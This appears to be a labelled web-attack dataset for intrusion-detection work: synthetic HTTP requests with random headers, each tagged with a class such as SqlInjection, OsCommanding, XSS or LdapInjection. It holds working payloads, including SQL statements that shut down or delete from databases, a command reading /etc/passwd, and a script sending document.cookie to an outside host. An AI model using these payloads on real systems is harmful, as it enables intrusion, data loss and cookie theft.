GET /oVWr_vXfnb@TNVnFqp/WlsTgRIvarYZZexecformX/hhktas/nsttaitkbleiiegajx/r3YpwZ.F2A/sock_streamhyQ/8fmixz/ndumtne6onLEUikt/mj/ek/iYTK@/sINXJI@SctEW9543.cfm?oa=eydb&kEirhTt=%29++++%28+++%7C%28+cn%3D*o%27brien*+%29%28mail+++%3D*o+++%27brien*%29+++ HTTP/1.1
Host: www.H2v2Zcott.be
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.3, x-mac-korean, windows-1252;q=0.8, iso-8859-5;q=0.6, iso-8859-9
Accept-Encoding: 
Accept-Language: tvna-fatnecoe;q=0.3, nuglee5-u8Btco;q=0.4, hsym-3nRce;q=0.0, 3-c1ta9l, raot-w
Cache-Control: atmsu61l='ao'
Client-ip: 10.62.13.43
Cookie: aprheeebedke=0;aiulaifs7uco=onxaTqtyiHt2atSud;otqhlN=7266;hnnxmpzne=ersnhheMe;tihotieab5Tu=7329
Cookie2: $Version="451"
Date: Tue, 21 Dec 04 15:06:07 CET
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: dtawu=4tsB
From: zoeyt@dfSho.com
If-Modified-Since: Thu, 22 Jun 06 19:05:47 UTC
If-Unmodified-Since: Tue, 28 Aug 07 18:17:04 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Tue, 01 Apr 08 03:09:34 GMT
Max-Forwards: 9
MIME-Version: 8.6
Pragma: oaNmhre=cUn
Proxy-Authorization: skno0 leiotlhl=mslla
Authorization: ethp 2hhte=rcbs
Range: 92-
Referer: /pec2i/cipzr/ghaqibal/eur2tgin/ouag.gif
TE: chunked,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 3.6; vn-to; rv:2.8.5) Gecko/96065564
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 649x451
Via: 2.4 www.oesljr.shtml:43
Transfer-Encoding: compress
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37931
Start - Id: 42309
class: SqlInjection
GET /atge8gmncit/tmJ.tiff?gduhe8xrt=nrtoo&uzBtiNuaeqxSeBe=oaasbfc4&1gxorQchG=94&tgepaesur=017&dKyuehevs3ejnex=udMK&mjtwa=%27%3B+shutdown--&uaa5deliocet=g%40NHWy9&ea=20&iM7rTtUg1.S=ef8sr%27te2anpesunion&OscriptbC=049875&lae07=tn3le1oeto4xdutspo&4wshlnooawheel=vGl%25%3Cousrscu&dlrgs=jmiSter&c6u=oStse0yy1lgtEi&hcsgsa5ln=68 HTTP/1.0
Host: 238.171.29.218:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.3, identity
Accept-Language: ii-tl, oI-u9eEayp;q=0.1
Cache-Control: a='85'
Client-ip: 50.218.71.30
Cookie: 1st1tFdska=iiumesIe;nkedcaytni7a=ddadmin;Enro1f=5;ndimam4dubT=odabme cs;ccgj5t=e0v
Cookie2: $Version="871"
Date: Fri, 04 May 07 06:06:29 CET
ETag: "3b.fk.WCMYAXJiT2"
Expect: 7seey=rendsha;rhldqs
From: h5dt@dgwd.cz
If-Modified-Since: Sat, 15 Jul 06 22:52:50 CET
If-Unmodified-Since: Mon, 17 Jan 05 15:48:45 GMT
If-Match: "z7iJ5rV@Ct983Df"
If-None-Match: "SLU@Ds83z2a8B-YtfJZ"
If-Range: Sat, 09 Aug 08 04:40:22 UTC
Max-Forwards: 5359
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic dHZhSWJjaTpucmVVdzk=
Range: -568889,-588214
Referer: http://OAem4nmr.st/nesah8o/itNxn/raee/nanra9.jsp
TE: deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 5.5; cd-lW; rv:9.9.2) Gecko/83019759
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4371x6437
Via: 4etce/4.8 www.edao3see.png
Transfer-Encoding: deflate
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 059 www.tMzr5N1s.jpg "haexetlge" "Wed, 23 Jul 08 08:40:57 CET"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42309
Start - Id: 43031
class: OsCommanding
PUT /amMf8e5RtLaabKYO/lfLIa2ii@..6WMO/y0u1TAY0Rc/trLsaeRthlrtcDa9t/nayglkAikl7ehee5ke/yOe9T2XgI/jCh/as/NNpwB3Dv.nsf? HTTP/1.1
Content-Length: 272
Content-Language: ulsat
Content-Encoding: deflate
Content-Location: /ttaead5s/eyxrse/qDitsxn.gif
Content-MD5: dTBvRWlmd2FhczU0bHNoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 10:31:06 CET
Last-Modified: Fri, 06 Jun 08 07:21:36 UTC
Host: 104.92.9.215
Connection: XaoehXo
Accept: application/postscript;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: vdhtuUn='HeOe'
Client-ip: 65.119.102.85
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="86"
Date: Wed, 10 Mar 10 09:51:04 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: VsNdtdt@rdorILi.de
If-Modified-Since: Fri, 16 Feb 07 13:46:01 UTC
If-Unmodified-Since: Mon, 07 May 07 24:31:59 CET
If-Match: "bBZeu2fqQzAwt@gdDc"
If-None-Match: *
If-Range: Sat, 12 Jan 08 10:38:17 CET
Max-Forwards: 8
Pragma: bpHyiwu=rwt
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Digest cnonce="uynuckdc"
Range: -98633,070828-,-9277
Referer: /stb9st/kcpN7nva/arhhe/esb2.mpg
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: rv.O.JJ5ZA http://www.ebxgze.uk
UA-CPU: Sparc
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 6.8 www.xwmk.tiff, 0.0 172.161.116.6
Transfer-Encoding: compress
Upgrade: 6CozN/5.3, aqmg/9.3, yryyou/0.4, eket/6.8, aiea/8.2
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8jen44uAOavr=w.7&8hNohdilmlasIe=6Euyhsanjs5loocas&ee7Liesafidiua=0ta6&ltOtt=~&sutrdmq=wra nt'&lLwinwsAhwEseen=httatnf8s&pO=stEnen&4brmer=foi&phEirybrsscq=| cat     ../../../../../../../etc/passwd  |&btumnswatctn=iE mn9&inio6ustgusa=pnPhnsr&S4=40657

End - Id: 43031
Start - Id: 45464
class: PathTransversal
GET /cXBAfRcuAzG-u@bL/UlsFXfV3xMucmd/wzthisttncthan/rujoEoan/x7AsYqKWuKRmrSa_/rEOa@_aN00W74M/izlW/3bI6WMT7/uh/ait.css?tp=ntre&k4HwaoRo=ein0&neg=hel&oTetsmoi=dWNOk&23nsguniV0i9=%5CWINNT%5Csystem.ini&tiframeplCcmdoselect_@=%7Co%3Cd&irnv=echocenm&m5xtm68gefN8=nt&qksuvmtE=nlehytr4loearfd1&httpsFhavingfuZMq=88&OlcoJt=tzoemnohsirootruaa&joteEi6r2ea8y=226369 HTTP/1.0
Host: www.ohal.fr
Connection: close
Accept: video/mpeg;q=0.2, audio/*;q=0.5, video/quicktime;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: ts=bhje
Client-ip: 104.75.30.146
Cookie: EraB1iOQONV=inUfuBYAW;eae6nimtjyfg=e<:;na8sqVeiJstbEn=]j;UJU7xmlbIhttps=weh;8t=16;epo=128
Cookie2: $Version="91"
Date: Fri, 16 Jun 06 01:05:14 GMT
ETag: "MWQpBPOD6G9PQ6YY5D"
Expect: 100-continue
From: eso4Aae@o0ky0.it
If-Modified-Since: Tue, 16 Sep 08 10:32:29 CET
If-Unmodified-Since: Mon, 16 Nov 09 13:43:56 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Feb 04 21:35:55 CET
Max-Forwards: 8519
Pragma: no-cache
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: ianw cFnsazM=HpFt
Range: -23,7962-,63876-540949
Referer: /Hrih.js
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: iRrS4r http://www.Wdrgrstx.fr
UA-CPU: Sparc
UA-Disp: 1778,2316,8
UA-OS: Win9x
UA-Color: color8
Via: Ehles/8.4 www.ft17.tiff, HTTP/5.3 www.FTri.css
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 398 216.136.8.238 "ivry" 
X-Forwarded-For: 93.18.219.115
X-Serial-Number: 347804024892974921
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45464
Start - Id: 42531
class: SqlInjection
GET /se/8oqZ6nu2twojJQUAhUA/aedbyad1pigTEewctaav/iUq5@77kdEhBwWNV9./hsth0/Hche1txDaweeiot/olWfX2uycpeUA/nv/kOer7a2breAtaear/e-0/l7yvYyBHr/aossedteaspympcd6p.js?ne=t&PbRJfbILXEb=b&ei2skenoeReto=hmetaq%29%7Cecte&eeucroruea=%27++%29%3B++delete++from++++users%3B++commit%3B+++dummy%28++%27 HTTP/1.0
Host: 15.87.90.226
Connection: sap7wui
Accept: application/*;q=0.7, audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8193
Client-ip: 193.221.217.71
Cookie: co=Et6irIwiderEohlto;2e9ezusciqnldU=19=Rs-aaiLdj@oqdu;tTldluegheo=2930;zn0ennieuglo=gwpwptno7ad7re
Cookie2: $Version="051"
Date: Sat, 10 Jun 06 01:02:32 CET
ETag: W/"2W7s5-ENre8Dzaenr_N"
Expect: 100-continue
From: tasre@attmgeuh.ch
If-Modified-Since: Fri, 16 Oct 09 19:35:19 CET
If-Unmodified-Since: Fri, 12 Nov 04 08:02:17 GMT
If-Match: "TvaPEl6WzRDHh49DB6OI"
If-None-Match: "2nbWypMfZ6WZ@btTMgbq"
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 57
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest nc=ABB8e3d4
Authorization: naiao P9E9e=cekn
Range: 79786-446
Referer: /xvnn4/eornos/sohrsbl/eeqT.tar
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: txi7ntit/1.7.5.6.7
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: riEn3/0.7 92.24.213.228, kFa/5.6 www.plsaese.js, 0.8 www.gn0enu.png
Transfer-Encoding: identity
Upgrade: hdxl/4.1, ir1i9/2.4
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42531
Start - Id: 35500
class: XPathInjection
GET /jDub3tghef/hWdpVvU3_uX2U5tO@we5/2bs3Daa/AzVuRsjmSpdttnpeeoo4/OwDu6tbo/mI8KSy-r_2eO8DUSSnHk/p1JnhAPht3VrO@BDF/6uebuGitisrldAa/tAaeatntawgjialg/ufparpda3M/z-4-mD3oRj6ode_ApvgL.aspx? HTTP/1.1
Host: www.eshiTlhaee.st
Connection: Mnecta
Accept: audio/basic;q=0.6
Accept-Encoding: identity, deflate;q=0.3, gzip;q=0.0, gzip
Accept-Language: *
Client-ip: 148.138.198.57
Cookie: tr4sljsspe2dvc=Nsd'm;hc=re;oeeZpoyqashjeit=ai8sadjfttodrn1i;2ineoaicseu6a=aufzM;iosM=149 or    s/fertcD/aieb/child::node()[position()=56]   or     9=;qi=exbw5leie51ein
Date: Sat, 18 Apr 09 15:55:36 CET
Expect: 100-continue
If-Modified-Since: Sat, 15 Aug 09 16:40:53 CET
If-Unmodified-Since: Thu, 23 Feb 06 24:40:58 CET
If-Range: Fri, 28 Jul 06 12:16:10 GMT
Max-Forwards: 1
Referer: http://te8nulsa.org/5tHoeai/uws9de4/eh5r.gz
User-Agent: uEBgFU5 http://www.Ltosd.org

null

End - Id: 35500
Start - Id: 39456
class: SSI
GET /eQDekR.0EDFcmLo4/ertnrjhaaiemghna/syk2v2m9dd/nuFju/eztuenetlepkwOm/Nselhiecl/lyrSut.NKN8l6/ittbhst.cfm?ranIklsycn=eseki8Nn&BQRr_ITvarLyym=0717771&et=%3C%21--%23email+fromhost%3D%22www.eogheot.com%22+tohost%3D%22mailbox.dUuae.com%22+message%3D%22zealgt+ouhtxea+5oe+eiwntT%22+fromaddress%3D%22eraL.com%22+toaddress%3D%22gtL.od3r.com%22+subject%3D%22at%22+sender%3D%22qe.com%22+replyto%3D%22lhb7ske.com%22+cc%3D%22ett%22+inreplyto%3D%22ua9rn+0fl+5tnr%22+id%3D%22st1pemail%22+--%3E HTTP/1.1
Host: 172.79.109.212
Connection: close
Accept: text/html, application/*;q=0.2, image/jpeg;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cookie: usarNisu21bois=tg4ByD;Tn=uyJ5n@8Tkbia
Date: Mon, 01 Oct 07 10:33:59 UTC
If-Match: "RQ-@Nuph6_o6whkOFda"
If-Range: Sat, 09 Apr 05 10:57:16 CET
MIME-Version: 7.4
Pragma: no-cache
Authorization: 1e6a iotee=ahkAdjln
Referer: http://i8amu.be/9inw7nty/usim/anttdla.php3
TE: chunked;q=0.7,trailers,trailers
Trailer: Referer
User-Agent: rIN_1MB92q http://www.eeutzadn.org
UA-OS: Linux
Transfer-Encoding: deflate

null

End - Id: 39456
Start - Id: 41601
class: SqlInjection
GET /eaqhhEel4/gMNGKfFocmYm/pnekkh2htrX47/4AZdrop.bin?OrdXLjh2S=t%25ri+4cy%3Etpe&Mo=%27%29++UNION+ALL+SELECT+++++35++FROM++1daotf+WHERE+++%28++++%27%27++++%3D++++%27&0n1tloteomnueoq=983120&gdthii=074&res61=je+&ta4mnt2e6alie5w=4qoihm%24dAnietsfpnv%3E9&i0gIDonEr=et7kies1b&azpnOiesee=pbUpmt&tot7ieee=6&deswazfhgw5neb=enLf8QOpLBk&updateNCHy=iaeesdo4neid1a&snd3v0u=st9T52&doassnssromypos=ietOsdCsn HTTP/1.1
Host: 75.241.179.51
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: max-age=08
Client-ip: 66.83.180.190
Cookie: AL9pxBGw3AZ=ss;hoa;sDperlE=enoixlertraqui;_and8Y=img8insert;Vtm5ihrkiad=75501720
Cookie2: $Version="7"
Date: Sat, 28 Nov 09 08:05:45 UTC
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 100-continue
From: eimuyt@enr2so.ch
If-Modified-Since: Fri, 26 Mar 10 02:31:42 GMT
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "D5yB_91ZKfigvC9u"
If-None-Match: "H3z-6TTwNx-g5OH"
If-Range: "egzvQJG3T5@HMmK"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Basic dGFhZWk6ZmZxTGF5Zg==
Range: 9034-
Referer: http://www.TiiisrOd.net/pyaii0/ecwQ3/ohfyolin/M1dhOpeS/ep0oher.nsf
TE: trailers,deflate
Trailer: Referer
User-Agent: Mozilla/5.8 (X11; U; Linux i586 1.7; 62-od; rv:5.9.7) Gecko/14476685
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 6.0 www.ro3ha6g.png
Transfer-Encoding: compress
Upgrade: w6of/9.8
Warning: 546 www.haslz.jpeg "O9dygy07fAaes" "Tue, 03 Jan 06 08:40:36 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41601
Start - Id: 38907
class: LdapInjection
GET /pam0q7GraRx0IDn/srheeogd.mdb?sihrdd=tr8lr7Dkt6tadhl&Elsosmatsrio=bunionsnSai3e&67el=6792906&aEqvasi=0&emttauMFsL=wlttsf&hs9s=484747&Q7Fbody=cl%29%28++%7C+++%28eln%3D*%29&iali=A+&iEywto5ewdr=906162&ci7erAt7eowina=uqonaekm&deleteWAg5=b3aetter HTTP/1.0
Host: 222.251.170.145
Connection: close
Accept: */*;q=0.2
Accept-Charset: cp-936, iso-8859-1, windows-1253
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale=2026
Client-ip: 68.221.116.115
Cookie: nO9io8=tygoaicsintqfciiy;Oupusss=a~ iaoBf4:o3;umocha8PPG4=tdocumentiecgymstdinivminsert 
Date: Fri, 01 Feb 08 14:29:57 CET
ETag: "@i@ld2RGu-_JOJorp8E"
Expect: 100-continue
From: neenu@alestrhlsH.gov
If-Modified-Since: Tue, 18 Oct 05 20:23:54 GMT
If-Unmodified-Since: Sat, 21 Mar 09 19:25:31 CET
If-Match: "aAl5EME3QyB0rxU@Vku6"
If-None-Match: *
If-Range: Sat, 03 Jun 06 03:36:29 GMT
Max-Forwards: 8
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: 3h2se aosE=ainerp3e
Authorization: Digest username="23tl"
Range: 82450-0782,-876
Referer: /hhyhg/ata2r/embre.jsp
TE: trailers,gzip;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: 9BBbMRou http://www.ghnrhe.be
UA-OS: Win95
Via: 4.6 www.0ddt.htm
Transfer-Encoding: compress
Warning: 988 www.a3ih.gif "etgtEnsolo2a" 
X-Forwarded-For: 62.216.65.91
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38907
Start - Id: 46773
class: XSS
POST /xNDl_plGT/eJwreL/ls-/ymwne/ugN5eu.7em/them/A.zwOwget@THABdfu/dDYxy53MU4vmXRPwmV/xtmpdivsNCtmpI/ei/Fs.UJQSF1JA/iiDIiOHMoeLfDy-SEv..php? HTTP/1.0
Content-Length: 190
Content-Language: 7i
Content-Encoding: gzip
Content-Location: http://www.o9rne.com/rc0dN/2fhsi4d/drenbt.aspx
Content-MD5: bmF0ZW5yZTZyaTZpRGF3RA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Feb 09 22:27:19 GMT
Last-Modified: Thu, 08 Mar 07 09:04:57 GMT
Host: www.tmhr.net
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, shift_jis;q=0.6, x-mac-japanese;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: loq-eds;q=0.3, nmolktab-idrrlbo0, na-iCu, smltdg2I-iaarezn, 9oie-nvatuc
Cache-Control: 8hctu='iEteaO'
Client-ip: 19.200.37.172
Cookie: srruosn=rrwindow.opent;natRain96hr3=steoi26ktns;lrbh=41757;yMsF2dha7at1soE=3ttctdh;2Dn0st9s=tEvONnVG
Cookie2: $Version="208"
Date: Wed, 10 Sep 08 22:58:09 CET
ETag: W/"45M3KI-DcdUxGVMkKvjw"
Expect: pnwtm=hnizs
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Thu, 08 Dec 05 08:17:29 UTC
If-Match: *
If-None-Match: "-BgwL8a8s9uvj2RS"
If-Range: "iDGLXhjkjg.ZIa96k"
Max-Forwards: 0483
MIME-Version: 7.2
Pragma: lilA=orelE4Tr
Proxy-Authorization: NTLM ZDdhaGVTbkhydGRUdGFlSGlnaWMwZXVydGlvbmRsb3Job3UyRXRkYWdpaXA=
Authorization: Digest uri=/aL4oa3dk/aIef.tar
Range: 462-
Referer: http://Rt1up.uk/t1srm/mloTn/h7mml/0zORia/Goosbe6.css
TE: chunked,trailers,trailers
User-Agent: 8gbBq-2p http://www.3Beia4ds.gov
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: srds
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 124.216.57.225
X-Serial-Number: 4765773
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ikiRr=<!-- -- --><script  >[document.location.replace  ('http://www.ilgeat.com/cgi-bin/alrietolel.cgi'+document.cookie);]</script ><!-- -- -->

End - Id: 46773
Start - Id: 48377
class: XPathInjection
GET /rbeoolIYtae1eMwmb/eIl9R_rtbrajKS2u-Ng/ics/15ZMu7/iw2byssnC2isotacnil/1cawb6knH/e3A5BdL6Anv/Ee0bb.css?7noOarff=6874&cpalwtSh6nvded=05&oUh=57417&_.DLnexec7v=asystemeuhy&tte5rtbid=90&peuFc9tnzpdro=%7En%27w&2ee=7538167&tc=dDhE&lqoh=mZJ9TI HTTP/1.0
Host: www.citajeJt.uk
Connection: close
Accept: text/plain;q=0.4, application/*;q=0.6, image/*
Accept-Charset: *;q=0.1
Accept-Encoding: compress;q=0.8, compress;q=0.7, compress, gzip;q=0.6, gzip
Accept-Language: n-r;q=0.2, nsp5obSt-one;q=0.8, vsKit-ol;q=0.9, 8ir6ne-ptxsh;q=0.5
Cache-Control: no-cache
Client-ip: 34.130.231.33
Cookie: 5ae=rse0Nfeiffe;dwa=3520
Cookie2: $Version="9"
Date: Fri, 30 Jun 06 06:34:44 GMT
ETag: W/"R3jwvlpSyvKD@X3"
Expect: 100-continue
From: rnjltn@certi8ho.ch
If-Modified-Since: Mon, 16 Feb 04 06:12:12 CET
If-Unmodified-Since: Sun, 11 Sep 05 13:51:55 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Nov 08 23:14:13 CET
Max-Forwards: 78
Pragma: no-cache
Proxy-Authorization: Digest username="aOiaWnc"
Authorization: Sro02h sftpW=dsse
Referer: http://knzg.it/efwr/tNitrtR8/hens2/hEeOhesa.doc
TE: trailers
Trailer: Date
User-Agent: 0xf7n'   or    path/child::node()[position()=N] or 'lae'='
UA-Disp: 373,940,32
UA-Pixels: 9943x7757
Via: 9.8 55.70.129.253, 0.1 25.217.218.162:5, 3.9 218.254.244.64
Transfer-Encoding: deflate
Upgrade: x7int/9.3, ecge/6.0, 9hOS/7.9, Ipthab/8.6
Warning: 207 51.200.199.142 "cdmsHtrstOtieyeEsd" 
X-Serial-Number: 63375075404459251

null

End - Id: 48377
Start - Id: 47755
class: XSS
GET /sthcarnaaesot5/75hD_MEPMG9utvCLZ/yr2SH25xhD2/5Ft/9ozEq2xOdE9/DI.dyRo-M6/fr/e0OQkm/leckay8uutsKs.jpg?dBLtddoAfvounEs=sstgrnhttpsvbscriptpexecRae&ett0ytarro=%3Dnhqaedoi5Tpi&wpasswdnetcatPCY99=6844911&jA5metajmailViBmJ=3503167430&tWM7s=8sjn&eyNtou=tCm-lFvSO&8-6@X=98264908&on4ho=uiu&etbJ2rucp=tX39&eIosen1=rgMx&1zdsubdsnsma=sl&ddrczeeaoo=i%22++++%3E%3Cbody%2520onload%3Dalert%28document.cookie%29%3B+%3E&3a=8updatesnl HTTP/1.1
Host: 221.229.159.17
Connection: keep-alive
Accept: application/zip, video/*, video/quicktime
Accept-Charset: windows-1257, hz-gb-2312, iso-8859-7, x-mac-greek;q=0.4, koi8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 244.205.136.111
Cookie: eceyee=9079492328;os6=nNC._9Cu1hZG;l3ysafmbX=rnpcoraus
Cookie2: $Version="9"
Date: Tue, 20 Apr 04 04:38:09 CET
ETag: "V0Vh57R1gKYyWC."
Expect: 100-continue
From: timd@onRl.biz
If-Modified-Since: Tue, 29 Jun 04 16:36:17 UTC
If-Unmodified-Since: Sat, 07 Mar 09 21:57:07 UTC
If-Match: *
If-None-Match: *
If-Range: "FfiN_DWQ5bd8SbPU"
Max-Forwards: 81
MIME-Version: 7.7
Pragma: e0v40ti='sL'
Proxy-Authorization: Basic b3Q3YXlzZm06ZHZjaG5m
Authorization: NTLM ZWV5bDVoaW41cmVldWJhd1RvZUQzdGVsb0JVYWVsZzBzNmE=
Range: 20-31,7-1,-6
Referer: http://9RNlfi.st/Lo5rwgh/rolhnHm/aaqg5e2t.swf
TE: deflate;q=0.4,trailers,deflate
Trailer: Date
User-Agent: dohn96 (sYxhUPs1)
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 561x6609
Via: wlfe/1.9 www.cqtJnru.js, 8.7 74.54.253.242, 4.0 95.121.132.173
Transfer-Encoding: seuAre; pfrGtM=tirrw
Upgrade: 4MX/4.5, oSoes/3.8, tmVhya/8.9, naep9a/7.9, 2rjisu/4.2
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 88.106.208.229
X-Serial-Number: 47690533150312984482
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 47755
Start - Id: 46580
class: XSS
GET /sXubC/i5/ugCPw4A50kf16fUA_/glXMatH/8ct/ekY/Xjnsiasf1n/6fEUJPR-AidOy/YyilmsNnHgraaiuapl0.php3?kSmf9IsN=lnl&hr=meer&7s4re=791&n0mugamtsucrwe=d5techoe&Aqutuio0s=metahj%26ro+eA%5Ce HTTP/1.1
Host: 37.94.9.222
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: <img     dynsrc =    "   javascript:   [alert('8nAudkse');]     "   >
Accept-Language: *;q=0.7
Cache-Control: mxCi=fT
Client-ip: 107.181.44.200
Cookie: Tnoouohxsi3=eAsnA;wi=7970;a1Eitiaavu8osci=o4nvtddey5st4;fljntla=ae49ugHO1t2in0nahs;H0owinteonsd=$yt;uUma=g5lsnrwagYcJs
Cookie2: $Version="22"
Date: Fri, 20 Nov 09 17:57:12 UTC
ETag: W/"ggPvguC2iGHQlzQ"
Expect: vaYEawl=cro7rI
If-Modified-Since: Wed, 21 Jan 09 19:24:02 GMT
If-Unmodified-Since: Tue, 05 Apr 05 06:18:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 877
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM cjdsdGM4YWNpdGJzb2UzaWhuY2g0dG9naXRiZG9laWZyOWlo
Authorization: Digest cnonce="nf9b"
Range: 76-918888
Referer: /s2wnihgt/6xt6s/hqtanho/voeb.jsp
TE: trailers
Trailer: Expect
User-Agent: sAe0i9E8NreOoonte
UA-CPU: x86
UA-Disp: 676,907,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5605x1554
Via: FTP/4.8 241.187.116.163, HTTP/0.8 86.121.218.24
Transfer-Encoding: gzip
Upgrade: teocua/2.1, aao5/0.7, onnw/4.6, 3ioRA/4.3, tmed0W/6.5
Warning: 726 www.ytnR.png "llgcrlhuiap" "Sat, 22 Mar 08 16:22:53 GMT"
X-Forwarded-For: 23.216.88.9
X-Serial-Number: 34246962990912
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46580
Start - Id: 42340
class: SqlInjection
GET /yNie60V/cSmV/ewyDNBv4ZYJE9RwcFIY/aasc/wtethenIttaidivlotE/uI2nGAbH/lzgixm3/2aoeN9eS3.cgi?miaxi=document&.vbscript30R=ucP1.&zhsibNrteanr=%3FhWk&1z=oftegetc&-Hqhttppv8=%27+OR+++++%27%27+++%3D++%27&rPeeab=opt&ubsrsonfnwpSB=ca&vLpo6G3rc=jhTK_mSc8s&Vr9YoJ1rGOV=1 HTTP/1.1
Host: 120.235.113.78
Connection: close
Accept: application/rtf, audio/basic, video/*;q=0.7
Accept-Charset: iso-8859-9;q=0.1
Accept-Encoding: 
Accept-Language: tnt6przi-iesu, VA-Dnhonv
Cache-Control: only-if-cached
Client-ip: 234.69.56.127
Cookie: likeuM8D=9250156;8tirCslhofs=qtiWeie4(;ttypo=140058;pDirveiwgans=r-B-8Kv9tN;sGrf=ih(mnt5|il8fetcs0siAo
Cookie2: $Version="054"
Date: Tue, 25 Mar 08 08:56:49 GMT
ETag: W/"W3Dl8Wik9y5E8q13ewRG"
Expect: 100-continue
From: taa7@n9I9.uk
If-Modified-Since: Fri, 04 May 07 20:00:41 CET
If-Unmodified-Since: Tue, 07 Sep 04 09:19:21 CET
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: *
Max-Forwards: 6
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest realm
